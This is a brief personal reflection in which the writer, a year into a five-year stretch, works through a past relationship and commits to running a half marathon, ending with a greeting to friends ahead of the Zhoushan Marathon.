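I have no complaints about where I am now. After all, only one of the five years has passed, and the room left to maneuver is endless. Still, after learning that W has found someone new, I dreamed about it at night. Perhaps completely forgetting past people and events is not that easy, so I must find something else to focus on. For now my greatest wish is to finish a half marathon; it may be the thing I have been most determined about in my life so far.

Finally, see you at the Zhoushan Marathon, my friends.

Keep running forever, whether young or not.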
